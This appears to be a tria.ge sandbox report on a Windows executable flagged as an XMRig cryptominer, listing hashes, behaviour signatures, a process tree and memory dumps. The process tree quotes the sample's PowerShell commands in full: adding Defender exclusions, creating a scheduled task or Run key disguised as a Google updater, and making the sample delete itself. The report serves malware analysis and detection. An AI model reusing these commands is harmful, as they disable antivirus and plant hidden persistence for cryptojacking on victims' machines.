Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

16/01/2024, 20:08

240116-yw2hnahhck 10

24/12/2023, 12:16

231224-pfpz9abhcp 10

28/08/2023, 15:19

230828-sqmvesca87 10

26/08/2023, 15:20

230826-sqz5radd21 10

20/08/2023, 00:19

230820-amltvacg48 10

20/08/2023, 00:19

230820-amkxjscg46 10

20/08/2023, 00:18

230820-al4y2aec9v 10

20/08/2023, 00:18

230820-al4m9scg45 10

20/08/2023, 00:18

230820-al32qscg44 10

20/08/2023, 00:18

230820-al3e7sec9t 10

Analysis

  • max time kernel
    432s
  • max time network
    1800s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    16/01/2024, 20:08

General

  • Target

    qM5GMXBk6hJE6Y5e(14).exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 29 IoCs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • UPX packed file 30 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious use of AdjustPrivilegeToken 31 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1252
      • C:\Users\Admin\AppData\Local\Temp\qM5GMXBk6hJE6Y5e(14).exe
        "C:\Users\Admin\AppData\Local\Temp\qM5GMXBk6hJE6Y5e(14).exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:2536
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2052
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2584
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
          3⤵
          • Creates scheduled task(s)
          PID:2728
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\qM5GMXBk6hJE6Y5e(14).exe"
        2⤵
        • Deletes itself
        • Suspicious use of WriteProcessMemory
        PID:2484
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2740
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
          3⤵
            PID:2508
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
          2⤵
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1960
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
          2⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1852
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
            3⤵
            • Creates scheduled task(s)
            PID:1632
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
          2⤵
          • Drops file in Program Files directory
          • Suspicious use of WriteProcessMemory
          PID:636
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
          2⤵
          • Drops file in Program Files directory
          PID:1528
        • C:\Windows\System32\conhost.exe
          C:\Windows\System32\conhost.exe qtdiqnkejoz
          2⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Suspicious behavior: EnumeratesProcesses
          PID:2372
        • C:\Windows\System32\conhost.exe
          C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2248
      • C:\Windows\System32\choice.exe
        choice /C Y /N /D Y /T 3
        1⤵
          PID:2672
        • C:\Program Files\Google\Chrome\updater.exe
          "C:\Program Files\Google\Chrome\updater.exe"
          1⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Drops file in Program Files directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3036
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {592D594A-C165-423B-9409-42CEECB2DAF6} S-1-5-18:NT AUTHORITY\System:Service:
          1⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2356
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic PATH Win32_VideoController GET Name, VideoProcessor
          1⤵
          • Detects videocard installed
          • Modifies data under HKEY_USERS
          • Suspicious use of AdjustPrivilegeToken
          PID:1268

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Program Files\Google\Chrome\updater.exe

          Filesize

          475KB

          MD5

          06750ac88c49cb91ca92a7974bae7b12

          SHA1

          ab5a34bd7e0d84e7b219ae747dfe10444824ced6

          SHA256

          d760852841f7230060824b90c6df8d22c7f8cfd394545c71c495883bebd4aea6

          SHA512

          3099d40d55e9b135606ba8f4512950b97d403cfbf6ede1d229e3ec07836b92fd31ad87640c5f0d99fe8980c20f99ff6fa2339aca6c85f47e248a5a6ee30e4aa2

        • C:\Program Files\Google\Chrome\updater.exe

          Filesize

          356KB

          MD5

          ce75cace63e1355af838f3efba033450

          SHA1

          1f2ee2398e6c85526f6352c5fd395370caef395d

          SHA256

          519c73c66583d79be26b6609e985edfe922edf67881c42b7e2ec3076e790cd4d

          SHA512

          6be9b500ceb0e4862d4dfc903842bd04937174d3a71ee30b4ed9509a5211905bab219efa44b93cb2463a818d6b660fb4aff1e92d3d1b417673289a2d9c73532a

        • C:\Program Files\Google\Libs\g.log

          Filesize

          198B

          MD5

          37dd19b2be4fa7635ad6a2f3238c4af1

          SHA1

          e5b2c034636b434faee84e82e3bce3a3d3561943

          SHA256

          8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

          SHA512

          86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

          Filesize

          7KB

          MD5

          1967f9ce85012a28a0a1717d29ca95b3

          SHA1

          86436fb66525f8bc9bbbe2870f96111cd2e74583

          SHA256

          d9e8b6b5fa473b67522e5ba7795083582604d2d735c0d42aade7236ce7eb6021

          SHA512

          6ea90b0f37b02812a5a2c29042e239f2975a3b837efabb4d301039b3392b9ad5845a7006bcf5223a951747975f665ba4b86fe1ff5f5bf387b4dcee20501bfda3

        • \Program Files\Google\Chrome\updater.exe

          Filesize

          374KB

          MD5

          85c0ac19aecd291cf89f47b1b8fb588f

          SHA1

          be1e9781be6a1c424457af01ee68ca9e5ee06133

          SHA256

          a527df7ee4c2321b66a891390d61fbfa72b448d0a798a87d70acc0361e97e516

          SHA512

          3cd4db981f0dad20c4713296c155dc7e3d9ce9a0aa02952a4153e70bba5f6ddb8b93c40128e8ce6617a106de23d48f3f73722b3c806fc5237e16b1dd29cc77ee

        • memory/1852-56-0x00000000015E0000-0x0000000001660000-memory.dmp

          Filesize

          512KB

        • memory/1852-54-0x00000000015E0000-0x0000000001660000-memory.dmp

          Filesize

          512KB

        • memory/1852-53-0x000007FEF5A00000-0x000007FEF639D000-memory.dmp

          Filesize

          9.6MB

        • memory/1852-58-0x00000000015E0000-0x0000000001660000-memory.dmp

          Filesize

          512KB

        • memory/1852-57-0x00000000015E0000-0x0000000001660000-memory.dmp

          Filesize

          512KB

        • memory/1852-59-0x000007FEF5A00000-0x000007FEF639D000-memory.dmp

          Filesize

          9.6MB

        • memory/1852-55-0x000007FEF5A00000-0x000007FEF639D000-memory.dmp

          Filesize

          9.6MB

        • memory/1960-47-0x0000000001130000-0x00000000011B0000-memory.dmp

          Filesize

          512KB

        • memory/1960-52-0x000007FEF5060000-0x000007FEF59FD000-memory.dmp

          Filesize

          9.6MB

        • memory/1960-48-0x000007FEF5060000-0x000007FEF59FD000-memory.dmp

          Filesize

          9.6MB

        • memory/1960-49-0x0000000001130000-0x00000000011B0000-memory.dmp

          Filesize

          512KB

        • memory/1960-50-0x0000000001130000-0x00000000011B0000-memory.dmp

          Filesize

          512KB

        • memory/1960-51-0x0000000001130000-0x00000000011B0000-memory.dmp

          Filesize

          512KB

        • memory/1960-46-0x000007FEF5060000-0x000007FEF59FD000-memory.dmp

          Filesize

          9.6MB

        • memory/2052-9-0x000007FEF5A00000-0x000007FEF639D000-memory.dmp

          Filesize

          9.6MB

        • memory/2052-7-0x000007FEF5A00000-0x000007FEF639D000-memory.dmp

          Filesize

          9.6MB

        • memory/2052-8-0x00000000029C0000-0x0000000002A40000-memory.dmp

          Filesize

          512KB

        • memory/2052-10-0x00000000029C0000-0x0000000002A40000-memory.dmp

          Filesize

          512KB

        • memory/2052-13-0x000007FEF5A00000-0x000007FEF639D000-memory.dmp

          Filesize

          9.6MB

        • memory/2052-11-0x00000000029C0000-0x0000000002A40000-memory.dmp

          Filesize

          512KB

        • memory/2052-12-0x00000000029C0000-0x0000000002A40000-memory.dmp

          Filesize

          512KB

        • memory/2052-6-0x0000000001F30000-0x0000000001F38000-memory.dmp

          Filesize

          32KB

        • memory/2052-5-0x000000001B580000-0x000000001B862000-memory.dmp

          Filesize

          2.9MB

        • memory/2248-88-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/2248-104-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/2248-130-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/2248-128-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/2248-126-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/2248-124-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/2248-122-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/2248-120-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/2248-118-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/2248-116-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/2248-114-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/2248-112-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/2248-110-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/2248-108-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/2248-106-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/2248-102-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/2248-100-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/2248-98-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/2248-68-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/2248-67-0x00000000001B0000-0x00000000001D0000-memory.dmp

          Filesize

          128KB

        • memory/2248-96-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/2248-94-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/2248-69-0x0000000000750000-0x0000000000770000-memory.dmp

          Filesize

          128KB

        • memory/2248-70-0x0000000000F50000-0x0000000000F70000-memory.dmp

          Filesize

          128KB

        • memory/2248-92-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/2248-72-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/2248-74-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/2248-75-0x0000000000750000-0x0000000000770000-memory.dmp

          Filesize

          128KB

        • memory/2248-76-0x0000000000F50000-0x0000000000F70000-memory.dmp

          Filesize

          128KB

        • memory/2248-90-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/2248-78-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/2248-80-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/2248-82-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/2248-84-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/2248-86-0x0000000140000000-0x00000001407F4000-memory.dmp

          Filesize

          8.0MB

        • memory/2372-77-0x0000000140000000-0x0000000140016000-memory.dmp

          Filesize

          88KB

        • memory/2372-71-0x0000000140000000-0x0000000140016000-memory.dmp

          Filesize

          88KB

        • memory/2536-0-0x000000013F110000-0x000000013F321000-memory.dmp

          Filesize

          2.1MB

        • memory/2536-29-0x000000013F110000-0x000000013F321000-memory.dmp

          Filesize

          2.1MB

        • memory/2584-20-0x000007FEF5060000-0x000007FEF59FD000-memory.dmp

          Filesize

          9.6MB

        • memory/2584-27-0x000007FEF5060000-0x000007FEF59FD000-memory.dmp

          Filesize

          9.6MB

        • memory/2584-23-0x000007FEF5060000-0x000007FEF59FD000-memory.dmp

          Filesize

          9.6MB

        • memory/2584-24-0x0000000002BF0000-0x0000000002C70000-memory.dmp

          Filesize

          512KB

        • memory/2584-21-0x0000000002BF0000-0x0000000002C70000-memory.dmp

          Filesize

          512KB

        • memory/2584-25-0x0000000002BF0000-0x0000000002C70000-memory.dmp

          Filesize

          512KB

        • memory/2584-22-0x0000000001DC0000-0x0000000001DC8000-memory.dmp

          Filesize

          32KB

        • memory/2584-19-0x000000001B570000-0x000000001B852000-memory.dmp

          Filesize

          2.9MB

        • memory/2584-26-0x0000000002BF0000-0x0000000002C70000-memory.dmp

          Filesize

          512KB

        • memory/2740-37-0x000007FEF5A00000-0x000007FEF639D000-memory.dmp

          Filesize

          9.6MB

        • memory/2740-36-0x0000000002720000-0x00000000027A0000-memory.dmp

          Filesize

          512KB

        • memory/2740-35-0x000007FEF5A00000-0x000007FEF639D000-memory.dmp

          Filesize

          9.6MB

        • memory/2740-40-0x0000000002720000-0x00000000027A0000-memory.dmp

          Filesize

          512KB

        • memory/2740-41-0x000007FEF5A00000-0x000007FEF639D000-memory.dmp

          Filesize

          9.6MB

        • memory/2740-39-0x0000000002720000-0x00000000027A0000-memory.dmp

          Filesize

          512KB

        • memory/2740-38-0x0000000002720000-0x00000000027A0000-memory.dmp

          Filesize

          512KB

        • memory/3036-66-0x000000013F690000-0x000000013F8A1000-memory.dmp

          Filesize

          2.1MB

        • memory/3036-45-0x000000013F690000-0x000000013F8A1000-memory.dmp

          Filesize

          2.1MB